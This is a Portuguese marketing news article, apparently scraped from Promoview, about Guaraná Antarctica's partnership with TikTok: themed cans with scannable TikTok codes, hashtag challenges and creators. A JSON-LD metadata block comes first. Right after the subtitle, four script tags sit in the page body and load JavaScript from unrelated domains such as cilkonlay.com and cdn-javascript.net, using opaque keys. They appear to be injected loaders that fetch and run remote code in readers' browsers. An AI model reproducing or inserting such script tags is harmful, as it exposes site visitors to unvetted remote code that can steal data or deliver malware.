\n\n\n\n\n\n","alternativeHeadline":"Febre na internet recebe a originalidade e o bom humor de da marca para a plataforma de vídeos curtos que mais cresce no mundo.\n\n\n\n\n\n\n\n","abstract":"Febre na internet recebe a originalidade e o bom humor de da marca para a plataforma de vídeos curtos que mais cresce no mundo.\n\n\n\n\n\n\n\n","articleBody":"Febre na internet recebe a originalidade e o bom humor de da marca para a plataforma de vídeos curtos que mais cresce no mundo.\r\n\r\nO TikTok é o principal destino do mundo para vídeos curtos. E para dar uma cara mais brasileira à essa febre da internet, Guaraná Antarctica - símbolo da originalidade e do bom humor do brasileiro - firmou com o TikTok uma parceria sem precedentes entre as marcas de todo o mundo.\r\n\r\nConfira as últimas novidades sobre marketing digital aqui.\r\n\r\nLeia também: Guaraná Antarctica quer brasileiro em lista de recordes do Twitter.\r\n\r\nCom conteúdo de entretenimento e vídeos com curadoria do TikTok, a marca leva sua inventividade e personalidade genuína para os milhões de usuários em todo o mundo, mostrando que Guaraná Antarctica é #CoisaNossa.\r\n\r\n“Somos uma marca jovem e acreditamos que estar no TikTok de uma forma autêntica nos ajuda a criar algo totalmente novo no mercado brasileiro. Queremos descobrir e crescer juntos com a plataforma e engajar uma geração nova e influente. Vamos cocriar com a equipe global do TikTok apostando no nosso maior ativo comercial, nossa lata.”, disse Mariana Dedivitis, gerente de marketing digital de Guaraná Antarctica.\r\n\r\n\r\n\r\nPara iniciar a parceria, a marca lança uma série de 27 latas temáticas com mensagens especiais sobre coisas que só os brasileiros sabem fazer, como o próprio Guaraná Antarctica. As latas também trazem um TikTok code – espécie de QR code que, ao ser escaneado, redireciona para o perfil de Guaraná Antarctica no TikTok, a primeira marca a integrar a presença do TikTok no produto.\r\n\r\nComo plataforma que se move por desafios de hashtags, todo mundo pode participar. Neste primeiro momento, Guaraná Antarctica lança quatro desafios e um time de 50 creators. E já no segundo dos desafios, a marca conquistou 7 milhões de views.\r\n\r\nTikTok é um dos aplicativos mais baixados do mundo em 2018 e o aplicativo não-jogo mais baixado para App Store e Google Play em agosto, de acordo com Sensortower.\r\n\r\nComo uma plataforma que celebra a diversidade e a criatividade, TikTok tornou-se um destino preferido para os usuários se expressarem por meio de seus vídeos. O que vale é a qualidade do conteúdo. \r\n\r\nMuitas tendências virais e memes que se tornaram populares em outras plataformas, como Twitter, Facebook e Instagram, nasceram da criatividade encontrada no TikTok, que fornece muitas ferramentas fáceis de usar de edição e captura de vídeo no aplicativo para que os usuários possam criar e compartilhar vídeos rapidamente, uma das principais tendências entre a geração móvel de hoje.\r\n\r\nAcesse o perfil de Guaraná Antarctica no TikTok aqui. A criação dos conteúdos é da agência Almap BBDO.\r\n\r\n ","speakable":{"@type":"SpeakableSpecification","cssSelector":[".single-head",".single-body"]},"isAccessibleForFree":true,"genre":["Mídia"]},{"@type":"WebPage","@id":"https://www.promoview.com.br/tiktok-e-guarana-fecham-parceria-inedita/","url":"https://www.promoview.com.br/tiktok-e-guarana-fecham-parceria-inedita/","name":"TikTok e Guaraná fecham parceria inédita - Promoview - Insights sobre Brand Experience","isPartOf":{"@id":"https://www.promoview.com.br/#website"},"primaryImageOfPage":{"@id":"https://www.promoview.com.br/tiktok-e-guarana-fecham-parceria-inedita/#primaryimage"},"image":{"@id":"https://www.promoview.com.br/tiktok-e-guarana-fecham-parceria-inedita/#primaryimage"},"thumbnailUrl":"https://uploads.promoview.com.br/2023/12/1b2dfacb.jpg","datePublished":"2019-11-12T06:55:00+00:00","dateModified":"2025-04-25T04:20:59+00:00","description":"Febre na internet recebe a originalidade e o bom humor de da marca para a plataforma de vídeos curtos que mais cresce no mundo.","breadcrumb":{"@id":"https://www.promoview.com.br/tiktok-e-guarana-fecham-parceria-inedita/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https://www.promoview.com.br/tiktok-e-guarana-fecham-parceria-inedita/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https://www.promoview.com.br/tiktok-e-guarana-fecham-parceria-inedita/#primaryimage","url":"https://uploads.promoview.com.br/2023/12/1b2dfacb.jpg","contentUrl":"https://uploads.promoview.com.br/2023/12/1b2dfacb.jpg","width":800,"height":480},{"@type":"BreadcrumbList","@id":"https://www.promoview.com.br/tiktok-e-guarana-fecham-parceria-inedita/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.promoview.com.br/"},{"@type":"ListItem","position":2,"name":"Experiência de Marca","item":"https://www.promoview.com.br/experiencia-de-marca/"},{"@type":"ListItem","position":3,"name":"Mídia","item":"https://www.promoview.com.br/experiencia-de-marca/midia/"},{"@type":"ListItem","position":4,"name":"TikTok e Guaraná fecham parceria inédita"}]},{"@type":"WebSite","@id":"https://www.promoview.com.br/#website","url":"https://www.promoview.com.br/","name":"Promoview","description":"Mergulhe nas últimas tendências do brand experience. Descubra as estratégias e experiências que estão definindo o futuro das grandes marcas.","publisher":{"@id":"https://www.promoview.com.br/#organization"},"alternateName":"Promoview","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.promoview.com.br/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https://www.promoview.com.br/#organization","name":"Promoview","alternateName":"Promoview","url":"https://www.promoview.com.br/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https://www.promoview.com.br/#/schema/logo/image/","url":"https://uploads.promoview.com.br/2024/11/dFvSDQWS-yoast-projeto-696x696-1-jpg.webp","contentUrl":"https://uploads.promoview.com.br/2024/11/dFvSDQWS-yoast-projeto-696x696-1-jpg.webp","width":696,"height":696,"caption":"Promoview"},"image":{"@id":"https://www.promoview.com.br/#/schema/logo/image/"},"sameAs":["https://www.instagram.com/promoview/","https://www.linkedin.com/company/promoview/","https://www.youtube.com/channel/UCDOyD3fGgwpvMsWF7pqi7AA","https://news.google.com/publications/CAAqBwgKMK-NuAswvKjPAw?hl=pt-BR&gl=BR&ceid=BRpt-419","https://open.spotify.com/show/6mken3c6hcUDSsc3VwEDlf?si=a2b3d9018a954fcc&nd=1&dlsi=695ae8972acb48d6","https://api.whatsapp.com/send/?phone=5511948022977&text&type=phone_number&app_absent=0"],"description":"Mergulhe nas últimas tendências do brand experience. Descubra as estratégias e experiências que estão definindo o futuro das grandes marcas.","email":"[email protected]","telephone":"41 991944093","legalName":"JULIO FEIJO NETO ME","foundingDate":"2006-08-18","vatID":"05.151.320/0001-66","numberOfEmployees":{"@type":"QuantitativeValue","minValue":"1","maxValue":"10"}},{"@type":"Person","@id":"https://www.promoview.com.br/#/schema/person/image/af4fc0bf9cab018130e1c090810cbd48","name":"Redação Promoview","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https://www.promoview.com.br/#/schema/person/image/5c28630bdeeca78554bd08ce207d5213","url":"https://uploads.promoview.com.br/2024/02/asdasdasdasdasdasd-120x120.png","contentUrl":"https://uploads.promoview.com.br/2024/02/asdasdasdasdasdasd-120x120.png","width":120,"height":120,"caption":"Redação Promoview"},"url":"https://www.promoview.com.br/autor/redacao-promoview/"}]}

Mídia

TikTok e Guaraná fecham parceria inédita

Febre na internet recebe a originalidade e o bom humor de da marca para a plataforma de vídeos curtos que mais cresce no mundo. <script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script> <script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script> <script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573518188446" type="text/javascript"></script> <script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>

Febre na internet recebe a originalidade e o bom humor de da marca para a plataforma de vídeos curtos que mais cresce no mundo.

TikTok é o principal destino do mundo para vídeos curtos. E para dar uma cara mais brasileira à essa febre da internet, Guaraná Antarctica – símbolo da originalidade e do bom humor do brasileiro – firmou com o TikTok uma parceria sem precedentes entre as marcas de todo o mundo.

Confira as últimas novidades sobre marketing digital aqui.

Leia também: Guaraná Antarctica quer brasileiro em lista de recordes do Twitter.

Com conteúdo de entretenimento e vídeos com curadoria do TikTok, a marca leva sua inventividade e personalidade genuína para os milhões de usuários em todo o mundo, mostrando que Guaraná Antarctica é #CoisaNossa.

“Somos uma marca jovem e acreditamos que estar no TikTok de uma forma autêntica nos ajuda a criar algo totalmente novo no mercado brasileiro. Queremos descobrir e crescer juntos com a plataforma e engajar uma geração nova e influente. Vamos cocriar com a equipe global do TikTok apostando no nosso maior ativo comercial, nossa lata.”, disse Mariana Dedivitis, gerente de marketing digital de Guaraná Antarctica.

Para iniciar a parceria, a marca lança uma série de 27 latas temáticas com mensagens especiais sobre coisas que só os brasileiros sabem fazer, como o próprio Guaraná Antarctica. As latas também trazem um TikTok code – espécie de QR code que, ao ser escaneado, redireciona para o perfil de Guaraná Antarctica no TikTok, a primeira marca a integrar a presença do TikTok no produto.

Como plataforma que se move por desafios de hashtags, todo mundo pode participar. Neste primeiro momento, Guaraná Antarctica lança quatro desafios e um time de 50 creators. E já no segundo dos desafios, a marca conquistou 7 milhões de views.

TikTok é um dos aplicativos mais baixados do mundo em 2018 e o aplicativo não-jogo mais baixado para App Store e Google Play em agosto, de acordo com Sensortower.

Como uma plataforma que celebra a diversidade e a criatividade, TikTok tornou-se um destino preferido para os usuários se expressarem por meio de seus vídeos. O que vale é a qualidade do conteúdo. 

Muitas tendências virais e memes que se tornaram populares em outras plataformas, como Twitter, Facebook e Instagram, nasceram da criatividade encontrada no TikTok, que fornece muitas ferramentas fáceis de usar de edição e captura de vídeo no aplicativo para que os usuários possam criar e compartilhar vídeos rapidamente, uma das principais tendências entre a geração móvel de hoje.

Acesse o perfil de Guaraná Antarctica no TikTok aqui. A criação dos conteúdos é da agência Almap BBDO.